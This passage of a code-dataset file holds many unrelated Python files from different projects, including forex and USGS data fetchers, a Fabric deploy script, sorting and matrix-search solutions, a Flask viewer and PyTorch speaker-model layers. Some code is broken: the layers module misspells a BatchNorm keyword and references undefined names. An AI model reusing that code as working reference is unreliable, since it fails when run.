pylms.player import Player\r\n\r\ndef Play():\r\n sc = Server(hostname=\"10.0.0.76\", port='9090')\r\n sc.connect()\r\n\r\n sqPCroom = sc.get_player(\"00:04:20:2a:70:77\") #computer room SB\r\n sqBedroom = sc.get_player(\"00:04:20:2a:6f:ac\") #bedroom SB\t\r\n\r\n\r\n if sqPCroom.get_power_state() == True:\r\n sqPCroom.set_power_state(False)\r\n \r\n if sqBedroom.get_power_state() == True:\r\n sqBedroom.set_power_state(False)\r\n \r\n\r\ndef main():\r\n Play()\r\n\r\n\r\n\r\nif __name__ == \"__main__\": main()\r\n\r\n\r\n\r\n","sub_path":"snippets/power_off_SBs.py","file_name":"power_off_SBs.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"119010108","text":"class IntRev(object):\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if(x >= -9 and x <=9):\n return x;\n xString = str(x);\n strArray = list(xString);\n i =0;\n j = len(xString)-1;\n if(x < 0):\n i =1;\n while(i < j):\n strArray[i], strArray[j] = strArray[j], strArray[i];\n i +=1;\n j -=1;\n ret = ''.join(strArray);\n result = int(ret);\n if(abs(result) > (2**31)-1):\n return 0;\n else:\n return result;\n \n \n ","sub_path":"IntRev.py","file_name":"IntRev.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192725015","text":"\"\"\" This is the malt.data.rates module.\n This module is primarily responsible for retriving historical rates from\n a data source, parse them and save them to file.\n\"\"\"\n\n# External imports\nimport csv\nimport datetime\nimport http.client\nimport json\n\n# Internal imports\nfrom malt import common\nlogger = common.get_logger(__name__)\n\n#===============================================================================\n# 
Functions:\n#===============================================================================\n\ndef get_daily_candles(instrument, start_date, end_date):\n \"\"\" Obtain a list of daily bid-ask candles for the given instrument.\n Candles are from start_date to end_date, both inclusive. Non-trading\n days will be skipped. Candles are aligned according to New York time\n at 17:00.\n\n Args:\n instrument: string. The currency pair. e.g. 'EUR_USD'.\n start_date: string. Formatted start date. e.g. '2015-11-24'.\n end_date: sting. Formatted end date. e.g. '2015-11-28'.\n\n Returns:\n candles: list of dictionaries, each representing a daily candle.\n Example:\n [{'volume': 28947, 'highAsk': 1.07594, 'openAsk': 1.0746,\n 'lowAsk': 1.06757, 'lowBid': 1.06741, 'closeBid': 1.06853,\n 'closeAsk': 1.06871, 'openBid': 1.07378,\n 'time': '2015-11-15T22:00:00.000000Z',\n 'complete': True, 'highBid': 1.07574}, {...}]\n \"\"\"\n # Construct request url.\n url = (\"/v1/candles?instrument={0}&start={1}&end={2}&\"\n \"candleFormat=bidask&granularity=D&dailyAlignment=17&\"\n \"alignmentTimezone=America%2FNew_York\"). \\\n format(instrument, start_date, end_date)\n\n # Open connection. Send request. Get response.\n # TODO: Distinguish between game and trade.\n conn = http.client.HTTPSConnection(common.GAME_URL)\n conn.request(\"GET\", url, \"\", common.GAME_HEADER)\n response = conn.getresponse()\n response_content = response.read().decode()\n conn.close()\n\n # Parse the JSON from the response and select 'candles'.\n candles = json.loads(response_content)['candles']\n\n # Check received candles are valid.\n assert (len(candles[0]) == 11 and\n set(common.CANDLE_FEATURES).issubset(set(candles[-1].keys())))\n\n # Log\n logger.info(\"Fetched daily candles for %s.\", instrument)\n\n return candles\n\n\ndef write_candles_to_csv(candles, out_file):\n \"\"\" Write the candles to the out_file file as a csv.\n\n Args:\n candles: list of dictionaries. List of candles containing open,\n close, high and low of bid and ask, time and volume.\n out_file: string. Location of the output file.\n\n Returns:\n void.\n \"\"\"\n # Write each candle line by line.\n with open(out_file, 'w') as csv_handle:\n\n # Write the headers first.\n writer = csv.writer(csv_handle, delimiter=' ')\n writer.writerow(common.CANDLE_FEATURES)\n\n # Initialize candle.\n candle = None\n for candle in candles:\n # Need to eliminate weekend candles.\n date = candle.get('time')[:common.DATE_LENGTH]\n date_obj = datetime.datetime.strptime(date, '%Y-%m-%d')\n\n # The day needs to be Sunday - Thursday.\n if date_obj.weekday() in [6, 0, 1, 2, 3]:\n row = [date] + [candle.get(field) \\\n for field in common.CANDLE_FEATURES[1:]]\n writer.writerow(row)\n\n return\n\n\ndef import_daily_candles():\n \"\"\" Fetch daily candles from common.START_DATE to date\n for all currency pairs.\n\n Args:\n void.\n\n Returns:\n void.\n \"\"\"\n for instrument in common.ALL_PAIRS:\n # Set up the output files.\n out_file_path = \"{0}/{1}.csv\".format(common.DAILY_CANDLES, instrument)\n start_date = common.START_DATE\n end_date = str(datetime.date.today() - datetime.timedelta(1))\n\n # Get the candles and write to file.\n candles = get_daily_candles(instrument, start_date, end_date)\n write_candles_to_csv(candles, out_file_path)\n\n return\n\n\ndef main():\n \"\"\" Main in data component.\n 1. 
Fetch daily candles from common.START_DATE to date\n for all currency pairs in common.ALL_PAIRS.\n \"\"\"\n import_daily_candles()\n\n return\n\n\n# Main.\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"malt/data/rates.py","file_name":"rates.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"592196068","text":"\n# This script downloads the observations from USGS aggreages\n# to weekly and saves as a csv\n\n# Potential additions:\n# Make this a function\n\n# Modify so it reads in the previous observation file\n# and only adds in the new obs\n\n# Have this automatically check what day it is\n# and figure out what weeks are complete\n# rather than requiring a week nummber input\n\n# %%\nimport pandas as pd\nimport numpy as np\nimport os\nimport dataretrieval.nwis as nwis\n\n\n# %%\n# User settings\n# refer to Seasonal_Forecast_Dates.pdf for the\n# list of dates associated with each forecast week\n# you should set forecast_week equal to the forecast\n# week that just completed\nweek = int(input('What forecast week is it? (1-16): ')) # Week 12, 11/13, Quinn and Ben\nstation_id = \"09506000\"\n\n# %%\n# read in the forecast data and setup a dataframe\n# filepath = os.path.join('..', 'Seasonal_Foercast_Dates.csv')\nfilepath = os.path.join('../weekly_results',\n 'weekly_observations.csv')\nprint(filepath)\nobs_table = pd.read_csv(filepath, index_col='forecast_week')\n\n\n# %%\n# Read in the observations and get weekly averages\nfor i in range(1, week+1):\n print(i)\n starti = obs_table.loc[i, 'start_date']\n endi = obs_table.loc[i, 'end_date']\n\n # read in the data from USGS\n # Read in the streamflow data and get the weekly average\n obs_day = nwis.get_record(sites=station_id, service='dv',\n start=starti, end=endi, parameterCd='00060')\n obs_table.loc[i, 'observed'] = np.round(np.mean(obs_day['00060_Mean']), 3)\n\n\n# %%\n# Write the updated observations out\nfilepath_out = os.path.join('..', 'weekly_results', 'weekly_observations.csv')\nobs_table.to_csv(filepath_out, index_label='forecast_week')\n\n# %%\n","sub_path":"evaluation_scripts/Get_Observations.py","file_name":"Get_Observations.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"481902009","text":"from flask import Flask, render_template\nfrom flask_bootstrap import Bootstrap\n\nimport redis\n\napp = Flask(__name__)\nBootstrap(app)\n\n@app.route(\"/\")\ndef index():\n \n alerts = {}\n try:\n conn = redis.StrictRedis(host=\"redis\", port=6379)\n \n for key in conn.scan_iter():\n alerts[key] = conn.get(key)\n\n except Exception as ex:\n print(ex)\n\n return render_template(\"index.html\", alerts=alerts)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host=\"0.0.0.0\")","sub_path":"web-logs/web-logs.py","file_name":"web-logs.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"388230384","text":"#!/usr/bin/env python3\n# coding=utf-8\n\n# 求素数\n\n# def _odd_iter():\n# n = 1\n# while True:\n# n = n + 2\n# yield n\n#\n#\n# def _not_divisible(n):\n# return lambda x: x % n > 0\n#\n#\n# def primes():\n# yield 2\n# it = _odd_iter()\n# while True:\n# n = next(it)\n# yield n\n# it = filter(_not_divisible(n),it)\n#\n# for n in primes():\n# if n < 1000:\n# print(n)\n# else:\n# break\n\n# re.sub() 替换\nimport re\n\ns = 'hello 123 haha 456'\nt = 
re.sub(r'\\d+','cacaca',s,2)\nprint(t)","sub_path":"utils/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"435255187","text":"import sys\nimport numpy as np\nfrom skimage.io import imread\n\nTHRESHOLD = 0.5\n\ndef get_bin_image(filename):\n image = imread(filename, as_grey=True)\n assert 0 <= np.min(image) <= 1\n image = image > THRESHOLD\n return image\n\n\ndef crop_center(image, shape):\n assert(len(shape) == 2)\n for i in range(2):\n assert(image.shape[i] >= shape[i])\n\n offset_i = (image.shape[0] - shape[0]) // 2\n offset_j = (image.shape[1] - shape[1]) // 2\n return image[offset_i:offset_i + shape[0],\n offset_j:offset_j + shape[1]]\n\n\ndef iou(filename1, filename2):\n image1, image2 = map(get_bin_image, (filename1, filename2))\n print(image1.shape)\n print(image2.shape)\n if image2.shape[0] > image1.shape[0]:\n image1, image2 = image2, image1\n image1 = crop_center(image1, image2.shape)\n print(np.count_nonzero(image1 & image2) * 1.\\\n / np.count_nonzero(image1 | image2))\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print('Pass 2 filenames.')\n exit(0)\n print(iou(sys.argv[1], sys.argv[2]))\n","sub_path":"utils/calc_iou.py","file_name":"calc_iou.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"18508691","text":"# Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:\r\n#\n#\n# \tIntegers in each row are sorted from left to right.\r\n# \tThe first integer of each row is greater than the last integer of the previous row.\r\n#\n#\n# Example 1:\r\n#\n#\n# Input:\r\n# matrix = [\r\n# [1, 3, 5, 7],\r\n# [10, 11, 16, 20],\r\n# [23, 30, 34, 50]\r\n# ]\r\n# target = 3\r\n# Output: true\r\n#\n#\n# Example 2:\r\n#\n#\n# Input:\r\n# matrix = [\r\n# [1, 3, 5, 7],\r\n# [10, 11, 16, 20],\r\n# [23, 30, 34, 50]\r\n# ]\r\n# target = 13\r\n# Output: false\r\n#\n\n\nclass Solution:\n def searchMatrix(self, matrix: 'List[List[int]]', target: 'int') -> 'bool':\n if not matrix:\n return False\n m, n = len(matrix), len(matrix[0])\n i = 0\n j = 0\n while i < m and j < n:\n if matrix[i][j] == target:\n return True\n if matrix[i][j] > target:\n break\n if i + 1 < m and matrix[i + 1][j] <= target:\n i += 1\n else:\n j += 1\n return False\n","sub_path":"074-search-a-2d-matrix/search-a-2d-matrix.py","file_name":"search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"352230167","text":"# Copyright 2021 Xuechen Liu\n# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)\n\nimport numpy as np\nimport os\nimport sys\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom attention import AttentionAlphaComponent\n\ndef get_nonlinearity(nonlinearity):\n if nonlinearity == 'relu':\n return F.relu\n elif nonlinearity == 'selu':\n return F.selu\n elif nonlinearity == 'tanh':\n return F.tanh\n else:\n sys.exit(\"nonlinearity must be relu|selu|tanh\")\n\n\ndef get_stats_pooling(pooling):\n if pooling == \"sp\":\n return MeanStdPoolingLayer()\n elif pooling == \"asp\":\n return AttentiveStdPoolingLayer()\n else:\n sys.exit(\"pooling must be sp|asp\")\n\n\nclass TdnnLayer(nn.Module):\n def __init__(\n self,\n dim_in,\n dim_out,\n filter_reach,\n bn_momentum=0.9,\n 
nonlinearity=\"relu\",\n ):\n super().__init__()\n self.batchnorm = nn.BatchNorm1d(dim_out, momemtum=bn_momentum, affine=True)\n self.nonlinearity = get_nonlinearity(nonlinearity)\n self.tdnn = nn.Conv1d(dim_in, dim_out, filter_reach*2+1,\n padding=filter_reach, padding_mode='zeros')\n \n def forward(self, x):\n x = self.tdnn(x)\n x = self.nonlinearity(x)\n x = self.batchnorm(x)\n return x\n\n\nclass ResTdnnLayer(nn.Module):\n def __init__(\n self,\n dim,\n filter_reach,\n bn_momentum=0.9,\n nonlinearity=\"relu\",\n ):\n super().__init__()\n self.linear = nn.Conv1d(dim, dim, 1, bias=True, padding=0)\n self.conv = nn.Conv1d(dim, dim, filter_reach*2+1, padding=filter_reach, padding_mode='zeros')\n self.linear_norm = nn.BatchNorm1d(dim, momentum=bn_momentum, affine=True)\n self.conv_norm = nn.BatchNorm1d(dim, momentum=bn_momentum, affine=True)\n \n self.nonlinearity = get_nonlinearity(nonlinearity)\n \n def forward(self, x):\n y = self.linear(x)\n y = self.nonlinearity(y)\n y = self.linear_norm(y)\n \n y = self.conv(y)\n x = self.nonlinearity(y+x)\n x = self.conv_norm(x)\n return x\n\n\nclass FcLayer(nn.Module):\n def __init__(\n self,\n dim_in,\n dim_out,\n bn_momentum=0.9,\n nonlinearity=\"relu\",\n ):\n super().__init__()\n self.batchnorm = nn.BatchNorm1d(dim_out, momemtum=bn_momentum, affine=True)\n self.nonlinearity = get_nonlinearity(nonlinearity)\n self.linear = nn.Linear(dim_in, dim_out)\n \n def forward(self, x):\n x = self.linear(x)\n x = self.nonlinearity(x)\n x = self.batchnorm(x)\n return x\n\n\nclass MeanStdPoolingLayer(nn.Module):\n def __init__(self):\n super(MeanStdPoolingLayer).__init__()\n \n def forward(self, x):\n m = torch.mean(x, dim=2)\n sigma = torch.sqrt(torch.clamp(torch.mean(x ** 2, dim=2) - m ** 2, min=1e-6))\n return torch.cat((m, sigma), 1)\n\n\nclass AttentiveStdPoolingLayer(nn.Module):\n def __init__(\n self, \n input_dim, \n num_attn_layers=2,\n stddev=True,\n stddev_attn=True,\n eps=1e-10,\n ):\n super().__init__()\n \n self.stddev = stddev\n self.stddev_attn = stddev_attn\n self.eps = eps\n \n self.attention = AttentionAlphaComponent(input_dim, affine_layers=num_atten_layers)\n \n def forward(self, x):\n alpha = self.attention(x)\n \n mean = torch.sum(alpha * x, dim=2, keepdim=True)\n if self.stddev :\n if self.stddev_attention:\n var = torch.sum(alpha * x**2, dim=2, keepdim=True) - mean**2\n std = torch.sqrt(var.clamp(min=self.eps))\n else:\n var = torch.mean((x - mean)**2, dim=2, keepdim=True)\n std = torch.sqrt(var.clamp(min=self.eps))\n return torch.cat((mean, std), dim=1)\n else :\n return mean\n\n\nclass SoftmaxLossLayer(nn.Module):\n def __init__(\n self,\n input_dim,\n num_targets,\n norm='mean',\n ):\n super().__init__()\n self.linear = FcLayer(input_dim, num_targets)\n self.loss = nn.CrossEntropyLoss(reduction=norm)\n \n def forward(self, x, y):\n posterior = self.linear(x) \n outputs = posterior.squeeze(axis=2)\n this_loss = self.loss(outputs, y)\n return this_loss","sub_path":"espnet2/sid/extractor/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"629845679","text":"# -*- mode: python -*-\na = Analysis(['planet-wars.py'],\n pathex=['/Users/freemanlatif/Documents/Masters/G54PRG/game'],\n hiddenimports=[],\n hookspath=None,\n runtime_hooks=None)\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='Planet Wars',\n debug=False,\n strip=None,\n upx=True,\n console=False )\n\n\nsound_tree = 
Tree('sound', prefix = 'sound')\nimg_tree = Tree('img', prefix = 'img')\nfont_tree = Tree('font', prefix = 'font')\ncoll = COLLECT(exe,\n a.binaries,\n sound_tree,\n img_tree,\n font_tree,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='Planet Wars')\n","sub_path":"planet-wars.spec","file_name":"planet-wars.spec","file_ext":"spec","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"127814576","text":"#!/usr/bin/python3\n\"\"\"usmanjabbar.com\"\"\"\nfrom fabric.api import env, run, put\nweb01, web02 = '35.196.94.233', '54.160.230.10'\nenv.hosts = [web01, web02]\n\n\ndef do_deploy(archive_path):\n \"\"\"\n -----------------\n METHOD: DO_DEPLOY\n -----------------\n DESCRIPTION:\n This method distributes and\n deploys an archive of web_static\n files\n ARGS:\n - Takes in a string with the path\n to the archive file\n NOTES:\n - If the archive_path doesn't exist,\n returns False\n \"\"\"\n from os.path import isfile\n\n # Check if that file actually exists\n if not isfile(archive_path):\n return False\n\n try:\n # Extract the file name from the var 'archive_path'\n archive = archive_path.split('/')[-1]\n\n # Upload, uncompress and delete the archive from the web servers\n put(archive_path, '/tmp/')\n out = '/data/web_static/releases/{}/'.format(archive.split('.')[0])\n run('mkdir -p {}'.format(out))\n run('tar -xzf /tmp/{} -C {}'.format(archive, out))\n run('rm -rf /tmp/{}'.format(archive))\n run('mv {}* {}'.format(out + 'web_static/', out))\n run('rm -rf {}'.format(out + 'web_static/'))\n\n # Del symbolic link 'current' and link extracted folder to current\n run('rm -rf /data/web_static/current')\n run('ln -s {} /data/web_static/current'.format(out))\n\n # All good, return True\n print('New version deployed!')\n return True\n\n except:\n return False\n","sub_path":"2-do_deploy_web_static.py","file_name":"2-do_deploy_web_static.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"453860103","text":"#!/usr/bin/env python3\n\n# Core python modules\nimport sys, os\n\n# Peripheral python modules\nimport argparse\nimport logging\n\n# python external libraries\nimport numpy as np\nimport pandas as pd\n\n# list of classes and methods we'd like to export:\n__all__ = [ \"merge_prize_files\", \"merge_prize_dataframes\" ]\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.INFO)\nhandler.setFormatter(logging.Formatter('%(asctime)s - Prizes: %(levelname)s - %(message)s', \"%I:%M:%S\"))\nlogger.addHandler(handler)\n\n\nparser = argparse.ArgumentParser(description=\"\"\"\n Create one prize file as expected by graph.py from multiple user input data types\"\"\")\n\nclass FullPaths(argparse.Action):\n \"\"\"Expand user- and relative-paths\"\"\"\n def __call__(self,parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))\n\ndef directory(dirname):\n if not os.path.isdir(dirname): raise argparse.ArgumentTypeError(dirname + \" is not a directory\")\n else: return dirname\n\nparser.add_argument(\"-o\" \"--out\", dest=\"output_file\", type=argparse.FileType('w'), required=True,\n help='Name of the output prize file with node attributes as columns, as expected by graph.py')\n\nparser.add_argument(\"-p\", \"--proteins\", dest='protein_file', type=argparse.FileType('r'), required=False,\n 
help='Proteomic data file with two tab-spaced columns: GeneSymbol\\tprize')\n\nparser.add_argument(\"-g\", \"--garnet\", dest='garnet_file', type=argparse.FileType('r'), required=False,\n help='Output file from Garnet, showing relevant TFs')\n\nparser.add_argument(\"-r\", \"--rna\", dest='rna_file', type=argparse.FileType('r'), required=False,\n help='mRNA data file with two tab-spaced columns: GeneSymbol\\tprize. Note that this file will only be used in the visualization, not in the choice of pathways in the protein interaction network. To use mRNA data to assign protein prizes, use Garnet.')\n\nparser.add_argument(\"-m\", \"--metabolites\", dest='metabolite_file', type=argparse.FileType('r'), required=False,\n help='Metabolomics data file with two columns: MetaboliteID\\tlogFC of metabolite. Make sure that your interactome includes metabolite interactions, the default does not.')\n\n\ndef output_dataframe_to_tsv(dataframe, output_file):\n \"\"\"\n Output the dataframe to a csv\n \"\"\"\n dataframe.to_csv(output_file, sep='\\t', header=True, index=False)\n\n\ndef merge_prize_files(prize_files, prize_types):\n \"\"\"\n Arguments:\n prize_files (list of str or FILE): a filepath or FILE object with a tsv of name(\\t)prize(\\t)more...\n prize_types (list of str): a node type name to associate with the nodes from each prize_file\n\n Returns:\n pandas.DataFrame: a DataFrame of prizes with duplicates removed (first entry kept)\n \"\"\"\n\n dataframes = []\n\n for prize_file, prize_type in zip(prize_files, prize_types):\n\n prize_df = pd.read_csv(prize_file, sep='\\t')\n prize_df.columns = ['name', 'prize'] + prize_df.columns[2:].tolist()\n prize_df['type'] = prize_type\n dataframes.append(prize_df)\n\n return merge_prize_dataframes(dataframes)\n\n\ndef merge_prize_dataframes(prize_dataframes):\n \"\"\"\n Arguments:\n prize_dataframes (list of pandas.DataFrame): a list of dataframes, each of which must at least have columns 'name' and 'prize'\n\n Returns:\n pandas.DataFrame: a DataFrame of prizes with duplicates removed (first entry kept)\n \"\"\"\n\n prizes_dataframe = pd.concat(prize_dataframes)\n prizes_dataframe.drop_duplicates(subset=['name'], inplace=True) # Unclear if we should do this?\n\n return prizes_dataframe\n\n\ndef main():\n\n args = parser.parse_args()\n\n prizes_dataframe = merge_prize_files([args.protein_file, args.garnet_file, args.metabolite_file], ['protein', 'garnet', 'metabolites'])\n\n output_dataframe_to_tsv(prizes_dataframe, args.output_file)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/prizes.py","file_name":"prizes.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"109470624","text":"def shell_sort(arr, gaps):\n for gap in gaps:\n for i in range(gap, len(arr)): \n temp = arr[i] \n\n j = i \n while j >= gap and arr[j-gap] > temp: \n arr[j] = arr[j-gap] \n j -= gap \n\n arr[j] = temp \n\n return arr\n","sub_path":"algorithms/shell_sort.py","file_name":"shell_sort.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"268420548","text":"import torch\nimport numpy as np\nfrom torch.autograd import Variable\nfrom torch import nn\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n\n\n\ndef inputs(inputs):\n inputs = Variable(torch.Tensor(inputs))\n return inputs\n\ndef targets(targets):\n targets = 
Variable(torch.Tensor(targets))\n return targets\n\ndef loaddatasets(x_train, y_train, batch_size):\n datasets = TensorDataset(x_train, y_train)\n batch_size = batch_size\n Data = DataLoader(datasets, batch_size, shuffle=True)\n return Data\n\ndef linear_model(x):\n return nn.Linear(3, 2)\n\ndef loss_fn():\n loss_fn = F.mse_loss\n return loss_fn\n\ndef train(Data, num_epoch, model, loss_fn, targets, lr):\n opt = torch.optim.SGD(model.parameters(), lr=lr)\n epochs = num_epoch/5\n for epoch in range(num_epoch):\n for x_train, y_train in Data:\n pred = model(x_train)\n loss = loss_fn(pred, y_train)\n loss.backward()\n opt.step()\n opt.zero_grad()\n \n if (epoch + 1) % epochs == 0:\n print('真实值为:', targets, '\\n预测值为:', pred)\n print('训练次数为[{}/{}]时,误差为:{:.6f}'.format(epoch + 1, num_epoch, loss.item()))\n\ndef predict(x,model):\n x_input = np.array((x), dtype=np.float32)\n x_input = torch.from_numpy(x_input)\n predict = model(x_input)\n print('预测苹果和橘子分别的产量为:',predict.data.numpy())\n\n","sub_path":"水果产量预测/.ipynb_checkpoints/fruit-checkpoint.py","file_name":"fruit-checkpoint.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"158458229","text":"import logging\nimport os\n\nimport pytest\n\nfrom stograde.common import chdir\nfrom stograde.specs.stogradeignore import load_stogradeignore\n\n_dir = os.path.dirname(os.path.realpath(__file__))\n\n\n@pytest.mark.datafiles(os.path.join(_dir, 'fixtures', 'stogradeignore'))\ndef test_load_stogradeignore(datafiles, caplog):\n with caplog.at_level(logging.DEBUG):\n with chdir(str(datafiles)):\n assignments = load_stogradeignore()\n\n log_messages = {(log.msg, log.levelname) for log in caplog.records}\n assert log_messages == {(\"Ignored specs: ['hw1', 'lab23', 'ws4', 'lab5']\", 'DEBUG')}\n\n assert set(assignments) == {'hw1', 'lab5', 'lab23', 'ws4'}\n\n\ndef test_load_stogradeignore_file_not_found(caplog):\n with caplog.at_level(logging.DEBUG):\n assignments = load_stogradeignore()\n\n log_messages = {(log.msg, log.levelname) for log in caplog.records}\n assert log_messages == {('No .stogradeignore file found', 'DEBUG')}\n\n assert isinstance(assignments, list)\n assert not assignments\n","sub_path":"test/specs/test_stogradeignore.py","file_name":"test_stogradeignore.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"48685360","text":"GENERATIONS = 30\nPOPULATION_SIZE = 200\nMAX_DEPTH = 2\nGAME_COUNT = 100\nIS_TOURNAMENT = False\nMUTATION_RATE = 0.1\nCROSSOVER_RATE = 0.65\nELITISM_RATE = 0.05\nTREE_MAX_DEPTH = 10\nTREE_INITIAL_MAX_DEPTH = 3\nELITISM = False\nNUMBERS = 7\n","sub_path":"settings/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"16461186","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0024_auto_20160426_0830'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='CustomPage',\n new_name='CustomPage1',\n ),\n ]\n","sub_path":"content/migrations/0025_auto_20160426_0848.py","file_name":"0025_auto_20160426_0848.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
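# A minimal usage sketch for the helpers in the fruit-checkpoint.py record above.
# Assumptions (not from the original record): the functions inputs, targets,
# loaddatasets, linear_model, loss_fn, train and predict from that file are in
# scope, and the apples/oranges training numbers below are made-up stand-ins.
x_train = inputs([[73., 67., 43.], [91., 88., 64.], [87., 134., 58.]])
y_train = targets([[56., 70.], [81., 101.], [119., 133.]])
data = loaddatasets(x_train, y_train, batch_size=3)
model = linear_model(None)  # linear_model ignores its argument and returns nn.Linear(3, 2)
# A small learning rate keeps the un-normalized inputs from making SGD diverge.
train(data, num_epoch=100, model=model, loss_fn=loss_fn(), targets=y_train, lr=1e-5)
predict([[74., 67., 43.]], model)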
+{"seq_id":"421162449","text":"\"\"\"\nHeadless CMS Application entry point.\n\"\"\"\nimport sys\nimport shlex\nimport argparse\n\n\nclass Application:\n \"\"\" Main application \"\"\"\n\n def run(self, argv):\n \"\"\" Runs the Headless CMS \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Headless CMS Application\",\n usage=argv[0] + ''' []\n\nstart Starts running as a service.\nconsole Start the interactive console.\nhelp Displays this help message\n\n''')\n parser.add_argument(\"command\", nargs=\"?\", default='console',\n help=\"Command to run.\")\n args = parser.parse_args(argv[1:2])\n\n if not hasattr(args, 'command'):\n command = \"console\"\n else:\n command = args.command\n\n if command == 'help':\n parser.print_help()\n return 0\n\n exec_command = \"_handle_\" + command\n if not hasattr(self, exec_command):\n print(\"Unrecognized command.\")\n parser.print_help()\n return -1\n cmd = getattr(self, exec_command)\n cmd(argv[2:])\n\n return 0\n\n def _handle_start(self, args):\n raise Exception(\"Not implemented yet.\")\n\n def _handle_console(self, args):\n print(\"Console mode activated. Type quit to exit.\")\n while True:\n line = input(\">>\")\n newargs = shlex.split(line)\n newargs.insert(0, '')\n if line == 'quit':\n break\n try:\n self.run(newargs)\n except Exception as e:\n print(e)\n\n\ndef run(argv):\n \"\"\" Runs the Headless CMS \"\"\"\n app = Application()\n app.run(argv)\n\n\nif __name__ == \"__main__\":\n run(sys.argv)\n","sub_path":"cms/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"181310960","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Importing libraries\n\n# In[1]:\n\n\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport os\nimport sys\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport io\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix,accuracy_score,classification_report\nfrom sklearn.metrics import roc_auc_score,roc_curve,scorer\nfrom sklearn.metrics import f1_score\nimport statsmodels.api as sm\nfrom sklearn.metrics import precision_score,recall_score\nfrom xgboost import XGBClassifier\nfrom lightgbm import LGBMClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.feature_selection import RFE\n\n\n# ## Setting Experiment Name\n\n# In[10]:\n\n\nimport mlflow\nimport mlflow.sklearn\n\n# Set the experiment name to an experiment in the shared experiments folder\nmlflow.set_experiment(\"/test_mlflow/3churnPrediction\")\n\n\n# # 1.Data\n\n# In[4]:\n\n\ntelcom = pd.read_csv(r\"WA_Fn-UseC_-Telco-Customer-Churn.csv\")\n#first few rows\ntelcom.head()\n\n\n# # 2. 
